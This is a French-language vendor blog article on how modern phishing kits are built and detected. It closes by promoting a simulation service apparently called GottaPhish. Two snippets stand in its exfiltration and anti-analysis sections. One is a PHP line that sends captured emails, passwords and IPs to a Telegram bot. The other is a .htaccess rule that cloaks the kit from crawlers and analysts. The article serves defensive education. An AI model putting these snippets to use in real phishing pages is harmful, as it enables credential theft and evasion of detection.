Anatomie d’un kit de phishing moderne
Un « kit de phishing » est le code packagé et réutilisable que les attaquants déploient pour cloner une page de connexion, récolter des identifiants et les exfiltrer. Comprendre comment ces kits sont construits — et comment ils se cachent — facilite grandement la détection précoce des campagnes et la conception de simulations défensives crédibles.
Ce que contient un kit
Un kit typique est une archive ZIP déposée sur un hôte compromis ou un hébergement bon marché. Sa structure est remarquablement constante :
kit/
├── index.php # la page d'atterrissage clonée
├── login.php # traitement du formulaire : capture + relaie les identifiants
├── assets/ # copies au pixel près des CSS, JS, logos, polices
├── config.php # cible d'exfiltration (e-mail, bot Telegram, URL distante)
├── antibots.php # listes de blocage des crawlers, bacs à sable, chercheurs
└── .htaccess # réécritures, filtrage géo/IP, protection anti-hotlink
Les kits modernes sont de plus en plus vendus « en tant que service » (PhaaS — Phishing-as-a-Service), avec tableaux de bord par abonnement, mises à jour et support.
Le clone
La page d'atterrissage est en général une copie octet pour octet d'un vrai écran de connexion, capturée avec un aspirateur de site ou un navigateur headless. Deux indices reviennent souvent :
- Des URL d'assets absolues pointant encore vers le CDN légitime (la page charge les vrais logos, mais le formulaire envoie vers l'attaquant).
- Un
<form>dont l'actioncible un traitement PHP local plutôt que le vrai endpoint de la marque.
Les kits avancés relaient le vrai site en temps réel (montage adversary-in-the-middle avec des outils comme Evilginx), transmettant la saisie de la victime au serveur légitime et volant le cookie de session obtenu — ce qui contourne la plupart des MFA.
La couche anti-analyse
Le composant antibots est ce qui maintient un kit en vie. Il filtre les visiteurs avant de servir la page de phishing :
- Filtrage user-agent et ASN — bloque les crawlers connus et les plages IP de Google, Microsoft, des éditeurs de sécurité et des bacs à sable cloud.
- Vérifications referer et géo — ne sert la page qu'aux cibles du pays attendu, redirigeant les autres vers le site légitime.
- Limitation de débit et liens à usage unique — un jeton dans l'URL qui se consume après une seule visite ; un échantillon transféré n'affiche plus qu'un 404 inoffensif.
# extrait de .htaccess
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://vraie-marque.example/ [R=302,L]
Voilà pourquoi une URL qui « semble morte » à un analyste SOC était pleinement active pour la victime quelques minutes plus tôt.
Capture et exfiltration des identifiants
Le traitement valide juste assez pour paraître réel, puis expédie les données. Les canaux d'exfiltration, par popularité décroissante :
- SMTP / mail() vers une boîte codée en dur.
- API Bot Telegram — un appel
sendMessagevers un token de bot, économique et résilient. - POST vers une URL de C2 ou un webhook Discord.
- Fichier journal local que l'opérateur récupère plus tard.
$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://vraie-marque.example/error");
Notez la redirection finale : après un « échec de connexion », la victime atterrit sur le vrai site, croit à une faute de frappe, se connecte avec succès et ne soupçonne rien.
Hébergement et diffusion
Les kits privilégient l'infrastructure jetable : sites WordPress compromis, redirections ouvertes sur des domaines de confiance, domaines sosies fraîchement enregistrés, et de plus en plus des services légitimes (Cloudflare Workers, IPFS, SharePoint, Google Docs) pour emprunter leur réputation. La diffusion associe le kit à un appât — une facture, une « re-vérification » MFA, une notification de document partagé.
Détection défensive
Signaux à chasser :
- Domaines récemment enregistrés ressemblant à votre marque (surveillez les logs CT et les typosquats).
- Hachage de favicon et du DOM — les kits réutilisent les assets exacts de la marque clonée.
- Appels sortants Telegram / webhook depuis des hôtes web qui n'ont aucune raison d'en faire.
- Soumission d'identifiants vers des origines inattendues dans la télémétrie navigateur.
- Rapports agrégés DMARC révélant les tentatives d'usurpation de votre domaine.
Vérité inconfortable : un bon kit AiTM contourne la MFA par SMS et par application en volant le jeton de session. Les méthodes résistantes au phishing — FIDO2 / passkeys — sont le correctif durable.
Comment GottaPhish aide
Les kits de phishing modernes s'appuient sur des clones au pixel près et sur le vol de session AiTM, qui contournent même la MFA par SMS et par application. GottaPhish et son équipe d'experts vous aident à affronter précisément cette menace : des simulations sûres et entièrement auditées reproduisant de vrais kits — liens à jeton unique, flux de capture d'identifiants, scénarios AiTM — avec des tableaux de bord montrant quels appâts fonctionnent et où la MFA tient. Nos experts vous accompagnent dans la configuration, conçoivent des scénarios calqués sur les techniques PhaaS actuelles et vous aident à interpréter les résultats sous forme de formation ciblée et de signaux concrets de detection engineering pour votre SOC.
